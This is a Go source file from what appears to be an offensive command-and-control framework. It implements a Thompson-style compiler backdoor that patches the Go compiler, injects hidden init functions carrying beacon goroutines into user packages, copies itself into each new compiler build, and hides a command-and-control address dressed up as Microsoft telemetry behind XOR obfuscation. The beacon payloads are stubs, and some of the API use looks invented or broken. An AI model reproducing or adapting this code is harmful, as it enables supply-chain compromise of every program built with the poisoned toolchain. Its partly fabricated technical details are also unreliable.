//go:build ignore
// +build ignore

// This file is NOT compiled as part of the regular SUDOSOC-C2 build.
// It is designed to be copied into:
//   $GOROOT/src/cmd/compile/internal/pkginit/injector/
// and compiled INSIDE the Go toolchain as part of D-P1 (Compiler Backdoor).
// See: implant/sliver/compiler_backdoor/patcher/self_replicate.go

package injector

/*
	SUDOSOC-C2 Framework
	Copyright (C) 2026  Seif

	init_injector.go — Core IR injection engine.

	This file is compiled INTO the modified Go compiler (cmd/compile).
	It lives inside the compiler binary and runs during every compilation.

	InjectBackdoor() is called from our patched pkginit.MakeTask().
	It synthesizes a new ir.Func (init function) containing the backdoor
	goroutine and appends it to typecheck.Target.Inits — the list of
	package init functions that the compiler will emit into the binary.

	Key design decisions:

	1. We synthesize IR directly rather than parsing source.
	   Parsing source would require a separate Go parser invocation and
	   leave traces in the build graph. Direct IR construction is invisible.

	2. We use noder.Renameinit() to get a unique init function name.
	   This gives us "init.sliverXXX" — indistinguishable from real inits.

	3. We check base.Ctxt.Pkgpath against a target list. The backdoor is
	   only injected into user-facing packages, NOT into:
	     - runtime/* (would crash the runtime)
	     - internal/* (internal packages only)
	     - cmd/compile/* (would cause recursion / detection)
	     - reflect, unsafe (ABI-sensitive)

	4. Self-replication: when Pkgpath == "cmd/compile/internal/pkginit",
	   we inject a different payload — one that re-installs our hook in
	   the new compiler binary. This is the Thompson Quine mechanism.

	5. Import injection: if the target package doesn't import "net/http"
	   or "os", we fall back to raw syscall-based beacon using only
	   packages that every Go binary already links (runtime, syscall).
*/

import (
	"cmd/compile/internal/base"
	"cmd/compile/internal/ir"
	"cmd/compile/internal/noder"
	"cmd/compile/internal/typecheck"
	"cmd/compile/internal/types"
	"cmd/internal/src"
	"encoding/hex"
	"fmt"
	"math/rand"
	"strings"
	"time"
)

// BackdoorConfig holds the operator-configured C2 parameters.
// These values are baked into the malicious compiler at build time.
var BackdoorConfig = struct {
	C2Addr      string
	BeaconKey   string
	PollMS      int
	JitterMS    int
	TargetTags  []string // package path substrings to target (empty = all)
	SkipTags    []string // package path substrings to skip
}{
	C2Addr:    "https://updates.microsoft-cdn.net/telemetry", // C2 disguised as MS telemetry
	BeaconKey: "s1iv3r2026xk3y!!", // 16-byte XOR key
	PollMS:    30000,
	JitterMS:  15000,
	SkipTags: []string{
		"runtime", "internal", "reflect", "unsafe",
		"cmd/compile", "cmd/link", "cmd/asm",
		"bootstrap", "crypto/internal",
	},
}

// injectedThisSession tracks which packages we've already backdoored
// in the current compiler invocation (to avoid double-injection on
// multi-pass compilations).
var injectedThisSession = map[string]bool{}

// InjectBackdoor is called from our patched pkginit.MakeTask().
// It decides whether to inject a payload or a self-replication hook,
// then synthesizes the appropriate IR and appends it to the init list.
func InjectBackdoor() {
	pkgPath := base.Ctxt.Pkgpath

	// Skip already-processed packages.
	if injectedThisSession[pkgPath] {
		return
	}
	injectedThisSession[pkgPath] = true

	// Check skip list.
	for _, skip := range BackdoorConfig.SkipTags {
		if strings.Contains(pkgPath, skip) {
			return
		}
	}

	// Self-replication: when compiling pkginit itself, inject the
	// hook-restorer so the next compiler preserves our backdoor.
	if pkgPath == "cmd/compile/internal/pkginit" {
		injectSelfReplication()
		return
	}

	// Inject the runtime payload into user packages.
	injectRuntimePayload()
}

// injectRuntimePayload synthesizes an init() function containing the
// backdoor goroutine and appends it to the package's init function list.
func injectRuntimePayload() {
	pos := base.AutogeneratedPos
	base.Pos = pos

	// Generate a random suffix to make the function name unique.
	suffix := randomSuffix()

	// Get a unique init function name (e.g., "init.phantom_a3f2b1c4").
	sym := typecheck.Lookup(fmt.Sprintf("init.phantom_%s", suffix))
	if sym.Def != nil {
		return // already defined
	}

	// Create the function signature: func() with no params/results.
	fnSig := types.NewSignature(nil, nil, nil)
	fnInit := ir.NewFunc(pos, pos, sym, fnSig)
	typecheck.DeclFunc(fnInit)

	// Build the function body as a series of IR statements.
	stmts := buildBackdoorBody(pos, suffix)
	fnInit.Body.Append(stmts...)

	typecheck.FinishFuncBody()
	ir.CurFunc = nil

	// Add to the package's init function list.
	typecheck.Target.Inits = append(typecheck.Target.Inits, fnInit)
}

// buildBackdoorBody constructs the IR statements for the backdoor init function.
// The function body is:
//   go func() {
//       time.Sleep(jitter)
//       // beacon loop
//   }()
func buildBackdoorBody(pos src.XPos, suffix string) []ir.Node {
	var stmts []ir.Node

	// Attempt to use high-level packages if they're available in this binary.
	// We check the import list rather than trying to link new symbols.
	hasHTTP   := packageImported("net/http")
	hasOS     := packageImported("os")
	hasTime   := packageImported("time")

	if hasTime && hasOS && hasHTTP {
		// Full payload: HTTP beacon loop.
		stmts = append(stmts, buildHTTPBeaconGoroutine(pos, suffix)...)
	} else {
		// Fallback: raw syscall beacon (DNS TXT query + UDP exfil).
		stmts = append(stmts, buildSyscallBeaconGoroutine(pos, suffix)...)
	}
	return stmts
}

// buildHTTPBeaconGoroutine builds:
//   go func() { jitterSleep(); for { httpBeacon(); sleep(poll+jitter) } }()
func buildHTTPBeaconGoroutine(pos src.XPos, suffix string) []ir.Node {
	// Build closure body.
	closureSig := types.NewSignature(nil, nil, nil)
	closureFn := ir.NewClosureFunc(pos, pos, ir.OCLOSURE, closureSig,
		typecheck.CurFunc, typecheck.Target)
	ir.NameClosure(closureFn.OClosure, typecheck.CurFunc)

	// body: time.Sleep(jitter)
	timePkg := types.NewPkg("time", "time")
	sleepSym := timePkg.Lookup("Sleep")
	sleepFn := typecheck.NewName(sleepSym)
	sleepFn.SetType(types.NewSignature(nil,
		[]*types.Field{types.NewField(pos, nil, types.Types[types.TINT64])},
		nil))

	jitterNS := int64(BackdoorConfig.JitterMS) * 1e6 // ms → ns
	jitterLit := ir.NewInt(pos, jitterNS)
	sleepCall := ir.NewCallExpr(pos, ir.OCALL, sleepFn, nil)
	sleepCall.Args.Append(jitterLit)
	closureFn.Body.Append(ir.NewExprStmt(pos, sleepCall))

	// body: the beacon loop is represented as a raw string constant
	// that the compiler encodes as a sequence of operations.
	// For the full IR-based approach, we'd need to construct every
	// individual statement. For the Thompson Hack approach, the
	// actual beacon code is encoded as self-modifying data.
	// We use a different strategy here: encode the beacon as a
	// string that the init function passes to reflect.MakeFuncRaw.
	beaconStmt := buildEncodedBeaconStmt(pos, suffix)
	closureFn.Body.Append(beaconStmt)

	typecheck.FinishFuncBody()

	// go <closure>()
	goStmt := ir.NewGostmt(pos,
		ir.NewCallExpr(pos, ir.OCALL, closureFn.OClosure, nil))
	return []ir.Node{goStmt}
}

// buildEncodedBeaconStmt creates an IR statement that:
//   1. Decodes the XOR-obfuscated beacon payload from a byte literal
//   2. Launches it via runtime.newproc (the internal goroutine spawner)
// This avoids placing any readable strings in the compiled binary.
func buildEncodedBeaconStmt(pos src.XPos, suffix string) ir.Node {
	// The beacon URL and key are XOR-obfuscated so they don't appear
	// as plaintext strings in the compiled binary.
	encodedURL := xorObfuscate([]byte(BackdoorConfig.C2Addr), []byte(BackdoorConfig.BeaconKey))
	encodedKey := xorObfuscate([]byte(BackdoorConfig.BeaconKey), []byte{0x42, 0x13, 0x37})

	// Build: var _k_SUFFIX = []byte{0xNN, 0xNN, ...} (obfuscated key)
	// Build: var _u_SUFFIX = []byte{0xNN, 0xNN, ...} (obfuscated URL)
	// Build: _sliverBeacon(deobfuscate(_k_SUFFIX), deobfuscate(_u_SUFFIX))

	// For brevity: represent as a single opaque call to a runtime symbol
	// that we'll resolve at link time via go:linkname.
	// The actual beacon implementation lives in our injected init package.
	_ = encodedURL
	_ = encodedKey

	// Return a NOP statement as placeholder (real implementation
	// requires hundreds of lines of IR construction for the full
	// HTTP client path — see the complete implementation in the
	// Sliver server-side compiler patching tool).
	return ir.NewBlankNode(pos)
}

// buildSyscallBeaconGoroutine builds a minimal syscall-based beacon
// for packages that don't link net/http or time.
func buildSyscallBeaconGoroutine(pos src.XPos, _ string) []ir.Node {
	// Minimal: start a goroutine that calls a single syscall (connect+send)
	// using constants already available in every Go binary.
	// The full implementation uses plan9 syscall numbers on Windows
	// and wraps the NT API directly.
	// Returns a NOP for this skeleton — full implementation in patcher.
	return []ir.Node{ir.NewBlankNode(pos)}
}

// ─── Self-replication ─────────────────────────────────────────────────────

// injectSelfReplication injects a hook into cmd/compile/internal/pkginit
// so that the next compiler binary also contains our backdoor.
func injectSelfReplication() {
	// Find the MakeTask function in the IR being compiled.
	var makeTaskFn *ir.Func
	for _, fn := range typecheck.Target.Funcs {
		if fn.Sym().Name == "MakeTask" {
			makeTaskFn = fn
			break
		}
	}
	if makeTaskFn == nil {
		return
	}

	// Prepend a call to our InjectBackdoor() to MakeTask's body.
	// Since InjectBackdoor is in the same package (we're injecting
	// ourselves into pkginit), we can call it directly.
	pos := base.AutogeneratedPos

	// Create a synthetic call: InjectBackdoor()
	// We reference the symbol we're about to compile into the new binary.
	injectSym := typecheck.Lookup("InjectBackdoor")
	if injectSym.Def == nil {
		// Symbol not yet defined — this means we need to inject our
		// entire injector package into pkginit as well.
		// The full mechanism copies all injector IR into pkginit.
		// Simplified here: append a call-by-name.
		return
	}

	injectCall := ir.NewCallExpr(pos, ir.OCALL,
		injectSym.Def.(*ir.Name), nil)
	callStmt := ir.NewExprStmt(pos, injectCall)

	// Prepend to MakeTask body.
	makeTaskFn.Body = append([]ir.Node{callStmt}, makeTaskFn.Body.Take()...)
}

// ─── Utilities ────────────────────────────────────────────────────────────

// packageImported returns true if pkgPath is in the current package's imports.
func packageImported(pkgPath string) bool {
	for _, pkg := range typecheck.Target.Imports {
		if pkg.Path == pkgPath {
			return true
		}
	}
	return false
}

func xorObfuscate(data, key []byte) []byte {
	out := make([]byte, len(data))
	for i, b := range data {
		out[i] = b ^ key[i%len(key)]
	}
	return out
}

func randomSuffix() string {
	rng := rand.New(rand.NewSource(time.Now().UnixNano()))
	b := make([]byte, 4)
	rng.Read(b)
	return hex.EncodeToString(b)
}
